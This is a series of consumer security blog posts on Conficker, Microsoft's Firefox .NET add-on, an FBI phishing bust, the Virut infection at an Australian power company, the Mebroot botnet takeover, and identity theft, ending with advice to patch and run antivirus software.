Conficker: 1 Year Later, 7 Million Infected

"'The only thing I can guess at is the person who created this is scared,' said Eric Sites, chief technology officer with Sunbelt Software and a member of the working group.

"'This thing has cost so many companies and people money to get fixed, if they ever find the guys who did this, they're going away for a long time.'"

This from a Network World write-up on Conficker, 1 year later.

What a lot of folks find perhaps most interesting about Conficker is,

"Despite its size, Conficker has rarely been used by the criminals who control it.

"Why it hasn't been used more is a bit of a mystery.

"Some members of the Conficker Working Group believe that Conficker's author may be reluctant to attract more attention, given the worm's overwhelming success at infecting computers."

Regardless of whether or not it has been used a lot 'til now, the fact of the matter is, that the Conficker Working Group estimates 7 million PCs have been infected thus far with variants A and B of the worm.

Another thing that caught our eye about the worm was that it's apparently very (perhaps most?) common in China and Brazil, which according to the Network World piece (although we could not confirm this) cites the Conficker Working Group, as,

"suspect[ing] that many of the infected PCs are running bootlegged copies of Microsoft Windows, and are therefore unable to download the patches or Microsoft's Malicious Software Removal Tool, which could remove the infection."

This policy of Microsoft's is definitely a subject of some debate.

Clearly, regrettably, a lot of people pirate Microsoft's software; that Microsoft in effect actually punishes others by helping to perpetuate the worm by refusing to allow the pirates to update their copies of Windows (or download the Malicious Software Removal Tool), really doesn't make sense.

Microsoft's belief, no doubt, is that if pirates can't use their computers because of the worms, they'll wise-up and buy legitimate copies of Windows.

I doubt it.

If a computer is infected, the solution to the pirate is most often just to re-install their OS from scratch if needed and to take other steps (i.e. like installing antivirus software) to prevent re-infection. Others just think their computers are slow and don't know why or ignore the worm altogether and go on about their day.

Whatever the case in the mean time though, by preventing updates, Microsoft's policy allows Conficker to spread, grow, and perpetuate.


Firefox Blocking Microsoft .NET Plugin/Add-on

There was a lot of noise starting back in February 2009 when Microsoft began pushing out a secret .NET plugin/add-on to Mozilla Firefox.

Among other problems was that Microsoft was installing the plugin to Firefox anytime you did a Windows update.

The complaints about this plugin were:
  1. There was no notification of the update.
  2. There was no practical way to prevent the update.
  3. Disabling the plugin was a supreme headache.
  4. Firefox isn't even a Microsoft product!
The good news about this is that Mozilla Firefox developers are now blocking the .NET plugin.

Given the list of problems cited above with this plugin, it's no wonder Mozilla devs moved to block the add-on.

We're not alone in wishing it had happened sooner, regardless though we're glad they have.

Sure, Microsoft has ever right to make a .NET plugin for Firefox. The problem is/was that they weren't giving users any notice the plugin was being installed.

They just did it.

Oh, and good luck getting it disabled once it's in there.

If Microsoft wants to make the download available as an optional installation AND make it possible to easily disable the plugin, that's fine.

What they did though is unacceptable as it was nigh impossible to disable for most users. If a security issue had arisen with it for which Microsoft, as they do from time-to-time, declines to issue a patch (or are slow to issue a patch), users would be hard pressed to disable the plugin to mitigate the risk.

Whoever at Microsoft was responsible for making this plugin work the way it did could have made it work the way they did for a few reasons:
  Microsoft's Possible Reasoning Why Their Reasoning Was Unsound
1. Give everyone a similar experience in Firefox they would have with Internet Explorer. Fine. Just give users the choice to opt out easily.

Give users the chance to disable easily the add-on at any time after installation if they don't like/want it.
2. Making it optional confuses too many people. If you're confused about what it is or how it works, how do you expect anyone to know what they're missing by not having the .NET add-on?
3. Making it difficult to remove makes it hard for people to miss out on the experience. What if there's a security issue? What if there's a stability issue? What if I just don't want it?

How can anyone minimize the security risk or test for stability issues if it's so difficult to remove?
4. Making it difficult to remove lets Microsoft extend its reach into Firefox. Why create more browser-related problems for Microsoft, which already has plenty of issues to contend with in the antitrust arena?

How would users feel if suddenly, without notifying users they were doing it, without giving users a chance to opt-out, and without users having a way easily undo what Microsoft had done, Microsoft started changing setting or adding "features" to something like Internet security software?

While not exactly Internet security software, per se, Firefox is installed by users because in many ways it does provide greater security than Internet Explorer.

No matter how you look at it, the way Microsoft chose to install the plugin, essentially injecting its own code into another company's product, without users' knowledge or consent, was unwise at best and while not exactly malicious, almost certainly not on the up-and-up.

I'm just glad Mozilla finally disabled the .NET add-on.

If you haven't updated your Firefox (or haven't yet tried it), you can download Firefox--the latest version, of course--and get the .NET plug-in disabled.


Conficker Sill Active

Back in March 2009 the worm Conficker gained notoriety for its countdown-to-activation.

We covered Conficker and removing Conficker quite extensively before and after the launch date, and now about six months later, it unfortunately comes as no surprise that systems are still being infected by it.

In fact, Kaspersky Antivirus, who publishes a list of the top malware stats every month in September 2009 still has Conficker in its various forms (called 'Net-Worm.Win32.Kido' by Kaspersky) occupying three of the top 20 malware spots.

The folks at Viruslist.com, who (along with a ton of other things) report on Kaspersky's malware statistics, go on to point out that, Kido (Conficker) remains active. Kido.ih, the leader of this Top Twenty for the last six months, has been joined by another variant, Kido.ir, which is a newcomer to the rankings

Removing Conficker isn't easy and many antivirus software vendors had a tough time getting a handle on how to remove the worm from infected PCs, but as far as we know every major antivirus program today is now capable of stopping and removing Conficker/Kido.

This is part of the reason, no doubt, why the authors of Conficker continue to write new versions: to try to thwart the A/V programs from stopping and removing their worm.

Regardless of whether or not your PC has been infected, make no mistake: just because it has been six months since Conficker's activation date, it's still a real threat, and if your PC is unpatched, all you have to do is be connected to a network (or the Internet) where there are other infected machines for yours to be at risk of infection, too.

This threat is all but eliminated if you're running any of the best firewall antivirus software or Internet security suites.

Lastly, as a reminder, do make sure your PC is has the latest patches. It typically takes just a few minutes to apply the patches and after a reboot (sometimes two!) you're in business.

Prior coverage of Conficker


Largest Phishing Ring Busted by FBI

Exciting news today in the fight against phishing: the FBI has charged over 100 people with that the Director is calling, "the largest international phishing case ever conducted."

There are some interesting details of this phishing ring bust including:

  1. U.S. Financial institutions were targeted
  2. Involved criminals in the U.S. and Egypt
      53 charged in the U.S.
      47 charged in Egypt
  3. Hundreds, possibly thousands of accounts were affected
  4. Approximately $1,500,000 stolen from affected accounts

Phishing is a particularly nasty crime because of the indiscriminate way it targets its victims and because the crime often goes unnoticed lengthy periods of time.

Imagine you get an email warning you that there's something wrong with your bank account or credit card. The email looks, sounds, and feels just like the real emails from your bank.

You click a link in it, and you're on your bank's website (or so you think...)

Sometimes, these phishing sites really do completely mimic the bank, so that the next thing you know this site, that looks so much like your bank to you has confirmed your details and is apologizing for the inconvenience and thanking you for your time.

Huh. That's it, and you go on with your day.

Just that fast, someone has your banking information and has transferred money out of it or purchased something on your credit card. Heck, maybe they even opened up a credit card or two in your name.

Whatever the case, when it comes to phishing there is good software today that, while not perfect, does help make the risk of being snagged by a phishing attack quite a bit lower.

The first place to start is with antivirus firewall software or an Internet security suite. There's no question that no software is completely foolproof; however, compared to the cost in time, money, and heartache of repairing your credit and getting your good name restored, the sticker price of even the priciest security software is really very, very low.

As for the cybercriminals in the U.S., they've been charged with:

  1. conspiracy to commit bank fraud
  2. computer fraud
  3. money laundering
  4. aggravated identity theft

Sounds like the FBI is throwing the book at 'em. And rightly so. According to the article, The bank fraud alone could lead to jail sentences of 20 years.

While that won't help restore the victims' good names or help them get their money back, at least the criminals are likely to be locked up for a long, long time.


Computer Virus Threatens Power Grid in Australia

Just a few days into October and already there's news of a computer virus attack that's,

"...wreaking havoc with Integral Energy's computer network, forcing it to rebuild all 1000 of its desktop computers before the 'particularly sinister' bug spreads to the machines controlling the power grid."


We learned of this from the Sydney Morning Herald, one of Australia's most highly regarded daily newspapers.

The article quotes an Integral Energy spokesman as saying they had to, rebuild all desktop computers to contain and remove the virus.

Double yuck.

Now, if you're like me, one of the first questions you'll likely ask is, "Didn't they have antivirus software installed?"

Well, according to the article, yes. In fact.

"Integral Energy said the virus was the W32.Virut.CF strain, which computer security company Symantec describes on its website as 'a particularly sinister file infector' that spreads quickly and 'is proving difficult to remove from infected networks'.

"Ironically, Integral Energy's computer networks are protected by a Symantec security solution, a source said. Symantec has had a virus signature for W32.Virut.CF since February."

[Editor's note: Symantec is perhaps best known for their A/V software Norton Antivirus.]

This brings up the next question: How did the virus evade detection by the antivirus security software. Although I don't have evidence of this, typically, corporations don't run the consumer version of software but so-called "corporate" editions, which commonly have advanced heuristics and central management consoles for managing all the desktops from one central location.

In many cases, when antivirus firewall software is installed into a corporate environment, the software may even be the Internet security suite version of a particular product.

 Given that they were probably running business antivirus software, I'm even more puzzled how it went undetected. Was this really a case where:

  1. the antivirus software failed
  2. human error allowed it to go unnoticed
  3. an insider intentionally set the virus loose on the network
  4. some combination of the above

We'll be following this story closely to see what develops. Hopefully, more light will be shed on this outbreak so we can help our business and home users alike prevent such a PC virus from hitting their computers.


Computer Security Researchers Take Control of a Botnet

We got wind today of a research project out of the University of California Santa Barbara (UCSB) that took over one of the most notorious botnets, Mebroot.

In an article on the takeover of the Mebroot botnet, the scope of the Mebroot problem is revealed: They found more than 6,500 websites hosting malicious code that redirected nearly 340,000 visitors to malicious sites.

Mebroot gained notoriety for taking over legitimate web sites and infecting those sites with malicious javascript code.

The idea behind such an attack was for the cybercriminal botnet operators to have a massively distributed network for attacking PCs visiting a range of legitimate websites, and thus for it to be much, much harder to stop and much, much more likely to be a stable place for them to get more end users' PCs to do their real bidding: cybercrime.

"'Once upon a time, you thought that if you did not browse porn, you would be safe,' says Giovanni Vigna, a UCSB professor of computer science and one of the paper's authors.

"'But staying away from the seedy places on the Internet is no longer an assurance of staying safe.'"

So the botnet worked like this:

  1. Take over legimate websites
  2. Infect these legimate websites with hidden malicious javascript that redirects visitors going to the legitimate sites to illegitimate websites where
  3. End users' PCs are then infected via a drive-by-download that silently takes over the visitors computer
  4. Use these end users' infected PCs to perform their cybercrimes (i.e. credit card theft, password theft, bank fraud, identity theft, etc.)

The article closes with this not-so-surprising detail:

"The researchers also discovered that nearly 70 percent of those redirected by Mebroot--as classified by Internet address--were vulnerable to one of almost 40 vulnerabilities regularly used by the most popular infection toolkits designed to compromise computer systems.

"About half that number were vulnerable to the six specific vulnerabilities used by the Mebroot toolkit.

"The research suggests that users need to update more often, says UCSB's Vigna.

"'Patches are very good at reducing the exposure of the end users, but users are not very good at updating their system,' he says."

The notion of patching more frequently is one we've covered in our site numerous times, and it's a message that warrants repeating regularly.

Why computer users, regardless of whether or not they're running the latest antivirus firewall software or not, don't do so is puzzling.

Updating your OS is an extremely simple process and is well worth the few minutes of time it takes in most cases. (Even when it takes longer, it's still worth it vs. the consequences of not doing so, and having your computer be more susceptible to takeover.

Here's how:

  1. Open Internet Explorer
  2. Click 'Tools' in the upper menu
  3. Click 'Windows Update'
  4. Click Express Update (or Custom Update to get full details on what you're updating
  5. Install any updates that Microsoft recommends

 Typically, you'll have to reboot after this. Then do it again, as some updates cannot be installed concurrently with others, so sometimes a couple of update cycles are needed.


Antivirus Software's Role in Preventing Identity Theft

I came across an interesting piece on identity theft by Andrew Patrick today.

In his blog on identity theft, he quotes a study on identity theft by Copes, H., and Vieraitis, L.M. (2009)1 which claims,
"Despite public perceptions of identity theft being a high-tech, computer driven crime, it is rather mundane and requires few technical skills.

"Identity thieves do not need to know how to hack into large, secure databases. They can simply dig through garbage or pay insiders for information.

"No particular group has a monopoly on the skills needed to be a capable identity thief."
Andrew also points out in his blog that,
"They were able to find 297 inmates, from which they sampled 59 inmates in 14 prisons across the country.

"The convicts agreed to do detailed interviews, in private, to talk about themselves and their crimes, and the results are reported in a recent issue of Criminal Justice Review."
There are a couple of things that are worth pointing out about this study:
  1. 297 inmates is a very small sample set that is hardly statistically significant by most any measure.

    According to the FTC's report on identity theft [.pdf], since the FTC began the Consumer Sentinel Network (CSN) in 1997 through December 2008, there were more than 7.2 million complaints of identity theft.

    Let's see: 7,200,000 - 297 = 7,199,703

    Sorry, but 297 is just too small of a sample size.
    1. That's just in the U.S.
    2. That only includes complaints filed with the FTC, not cases where the consumer took action but didn't file a complaint with the FTC.
    3. That does not include cases where the consumer never noticed the theft.
  2. The 297 inmates were the ones that were caught.

    It's worth considering that perhaps that they weren't technology-based identity thieves, but rather ones committing their crimes in the real world lead them to be caught in the first place.

    Put another way: if they'd been in Indiana stealing someone's identity in California they would have never been caught, as the identity thieves were who caught in JC Penny's trying to use (ironically enough) JC Penny's employee Michelle McCambridge's identity.
  3. As pointed out by the Internet Danger Report The identity thieves who never get caught are the professionals who deal in them on a wholesale basis.
My point here is that while a large portion of identity theft is definitely committed in the real world, as individuals and organizations involved in computer, information, and personal security, it's disingenuous if not naive of us to lead consumers to believe there is no threat to them online.

That's just not true.

What is true is that identity theft sucks. Clearly.

It's smart to always shred any documents that might have some of your personal information, no matter how seemingly insignificant, before disposing of them.

Installing and running firewall antivirus software is, like shredding your paper files, definitely a best-practice to keep your identity safe from the crackers, identity thieves, and other cyber criminals who want to steal from you.

Furthermore, there's little question that the threats online are real and that there are steps we can all take to keep these threats at bay and keep ourselves safe online.

That said, ignoring the threat and treating it like it's a problem somehow not related to the Internet is really illogical.

If there are simple steps for PC protection, why not take them?

1Copes, H., and Vieraitis, L.M. (2009) Understanding identity theft: Offenders’ accounts of their lives and crimes. Criminal Justice Review, 34(3), 329-349